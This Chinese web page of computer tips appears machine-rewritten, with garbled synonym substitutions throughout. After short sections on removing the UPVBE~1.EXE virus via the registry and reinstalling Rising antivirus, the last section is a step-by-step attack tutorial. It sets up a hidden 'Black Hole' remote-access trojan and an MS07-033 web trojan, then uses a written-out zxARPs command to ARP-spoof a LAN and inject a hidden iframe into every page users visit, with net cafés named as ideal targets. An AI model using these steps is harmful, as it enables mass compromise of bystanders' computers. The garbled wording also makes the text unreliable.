最近很多电脑都中了一个叫UPVBE~1.EXE的病毒,中毒特色就是在电脑开机时产生DOS窗口,窗口上方显示C:\Windows\system32\UPVBE~1.exe 。在网上查到的处置方法是在“系统性能适用程序”的启动项处,去除UPVBE的启动项即可处置疑问。可是在启动项中基本就没有发现关系的内容,于是很多中毒者只好忍受这个病毒的“折磨”,对它心甘情愿。笔者后来也是如此,后来真实受不了那个DOS窗口,经过一番探索,找到了处置的方法,现跟大家分享,宿愿对遇到这个病毒的读者有所协助。首先按“开局→运转”,输入“regedit”,而后在注册表中定位到HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows,删除Load中加载的物品,而后又定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,其中有“explorer REGSZ ‘.vbe” 这一项,这里的’.vbe 就是疑问的根源。删除该注册表项,而后重启电脑,那个宜人的DOS窗口就没有了。
如何极速更新病毒库
咱们自己经过制造程序制造的装置包,只能让咱们复原到在制造过后的病毒库。这就须要咱们经常做,太费事了!而下载装置瑞星制造的装置包,则能让瑞星复原到重装系统前的最新病毒库。但有一点就是咱们在首次装置瑞星时,不要装置在系统盘上,否则重装后就什么都没有了!假定咱们的杀毒软件是装在D盘的,那么在重装后关上D盘,在目录D:\Program Files\Rising\Rav\Update下找到Setup.exe装置程序,而后双击运转,就会产生装置界面了。而后选用相反的门路启动笼罩装置就可以了。由于装置时所经常使用的是更新后的病毒库,所以装置后的瑞星,就曾经是最新的版本了,罢黜了漫长的跨版本更新环节。其自杀毒软件的更新操作相似。 呵呵,是不是快多了?
如何在局域网挂arp木马
网页挂马最难的就是流传了,小网站易入侵然而访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马模式开局盛行——局域网ARP诈骗挂马,只需局域网内一台机子中招了,它就可以在内网流传含有木马的网页,捕捉的肉鸡就会成几何倍数增长。局域网ARP诈骗挂马的好处如下:无需入侵网站,只需你的主机处于局域网中即可,这是它最大的优势;收获的肉鸡多多,短期间内可以收获数十台甚至上百台肉鸡,相似网吧这样由上百台电脑组成的局域网是最好的挂马场合;局域网内的用户访问任何网站都会中木马。看了下面的引见,各位是不是曾经跃跃欲试了?第一步:性能木马服务端咱们以《黑洞》木马为例。运转《黑洞》木马的Client.exe文件,进入Client.exe的主界面后,点击“文件→创立DLL拔出版本服务端程序”。进入服务端程序的创立界面后,首先勾选“Win NT/2000/XP/2003下暗藏服务端文件、注册表、进程和服务”,而后切换到“衔接选项”标签,在“主机”一栏中填入本机的公网IP地址,端口可以坚持自动的“2007”。最后在“衔接明码”处填入用来衔接对方的明码,例如123456。设置成功后点击“生成”按钮,将木马服务端保留为muma.exe。
第二步:生成网页木马既然是挂马,那当然缺不了网页木马了。这里咱们用“MS07-33网马生成器”为例。运转“MS07-33网马生成器”,在“网马地址”文本框中输入木马所在门路,由于等会咱们要自行架设HTTP服务,所以这里应该填入““,其中192.168.0.2是本机在局域网中的IP地址。点击“生成网马”按钮即可生成网马hackll.htm。第三步:开启本机HTTP服务要让局域网中的其余主机能够访问到咱们的网马,就要开启本机的Http服务。下载Baby Web Server,这是一款便捷的Web主机软件,下载后间接运转,在其主界面中点击“服务→设置”。将“网页目录”设置为网页木马所在的中央,例如C盘根目录“C:\“。点“确定”回主界面,而后再点“Start”按钮开启本机的Http服务。记住要将木马服务端和网页木马放到C盘根目录。第四步:局域网挂马最后该请咱们的主角出场了,就是上文中提到的小工具,这个工具叫zxARPs,是一个经过ARP诈骗成功局域网挂马的工具。在经常使用zxARPs前咱们要装置WinPcap,它是网络底层驱动包,没有它zxARPs就运转不了。装置好后将zxARPs放到恣意目录,而后运转“命令揭示符”,进入zxARPs所在的目录,而后输入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert “<iframe src=‘’ width=0 height=0>”。回车后挂马就成功了。从如今开局,局域网中的用户无论访问什么网站,都会运转咱们的网页木马,由于zxARPs在用户关上网页的同时曾经将挂马代码拔出到反常网页中了。
From:
本站内容来源于网络,如不慎侵犯了您的权益,请联系我们将迅速删除。
